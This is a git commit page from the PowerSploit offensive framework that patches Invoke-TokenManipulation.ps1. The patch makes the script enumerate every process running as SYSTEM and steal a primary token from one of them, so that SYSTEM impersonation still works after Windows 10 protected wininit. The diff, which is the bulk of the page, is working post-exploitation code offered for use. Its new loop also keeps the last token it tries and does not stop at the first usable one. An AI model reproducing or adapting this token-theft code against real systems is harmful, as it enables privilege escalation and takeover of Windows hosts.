diff options
| author | FixTheExchange <josh.bryant@custommopar.com> | 2015-10-30 11:38:57 -0500 |
|---|---|---|
| committer | FixTheExchange <josh.bryant@custommopar.com> | 2015-10-30 11:38:57 -0500 |
| commit | 17dd6835b97ee8c40e02319301e09be35770cd2f (patch) | |
| tree | e990df435e395f4e9e61692fc762430bd0be8c2a /Exfiltration | |
| parent | 9f78286ea7b0ec65d2aa09893a076864dd8d14e9 (diff) | |
| download | PowerSploit-17dd6835b97ee8c40e02319301e09be35770cd2f.tar.gz PowerSploit-17dd6835b97ee8c40e02319301e09be35770cd2f.zip | |
Update Invoke-TokenManipulation.ps1
Windows 10 breaks the current version of Invoke-TokenManipulation.ps1 because wininit is now a protected processes. Rather than hardcoding to a specific process to obtain a SYSTEM token, it's better to enumerate all processes running as SYSTEM and find one that works. I have updated the script to version 1.12 and added logic on lines 1689-1696 to make sure it can successfully grab a SYSTEM token necessary to function.
Diffstat (limited to 'Exfiltration')
| -rw-r--r-- | Exfiltration/Invoke-TokenManipulation.ps1 | 15 |
1 files changed, 11 insertions, 4 deletions
diff --git a/Exfiltration/Invoke-TokenManipulation.ps1 b/Exfiltration/Invoke-TokenManipulation.ps1 index 7bfce3b..bc680e5 100644 --- a/Exfiltration/Invoke-TokenManipulation.ps1 +++ b/Exfiltration/Invoke-TokenManipulation.ps1 @@ -49,8 +49,8 @@ Author: Joe Bialek, Twitter: @JosephBialek License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None -Version: 1.11 -(1.1 -> 1.11: PassThru of System.Diagnostics.Process object added by Rune Mariboe, https://www.linkedin.com/in/runemariboe) +Version: 1.12 +(1.11 -> 1.12: Simple logic added by Josh M. Bryant to find an unprotected process to grab a SYSTEM token from, rather than hardcoding to wininit, https://www.fixtheexchange.com/) .DESCRIPTION @@ -1685,8 +1685,15 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke $AllTokens = @() #First GetSystem. The script cannot enumerate all tokens unless it is system for some reason. Luckily it can impersonate a system token. - #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges, so impersonate the wininit token. - $systemTokenInfo = Get-PrimaryToken -ProcessId (Get-Process wininit | where {$_.SessionId -eq 0}).Id + #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges. + #We need to enumrate all processes running as SYSTEM and find one that we can use. + $SystemTokens = Get-Process -IncludeUserName | Where {$_.Username -eq "NT AUTHORITY\SYSTEM"} + ForEach ($SystemToken in $SystemTokens) + { + $SystemTokenInfo = Get-PrimaryToken -ProcessId $SystemToken.Id -WarningAction SilentlyContinue -ErrorAction SilentlyContinue + $SystemProcessName = $SystemToken.Name + $SystemProcessID = $SystemToken.Id + } if ($systemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken))) { Write-Warning "Unable to impersonate SYSTEM, the script will not be able to enumerate all tokens" |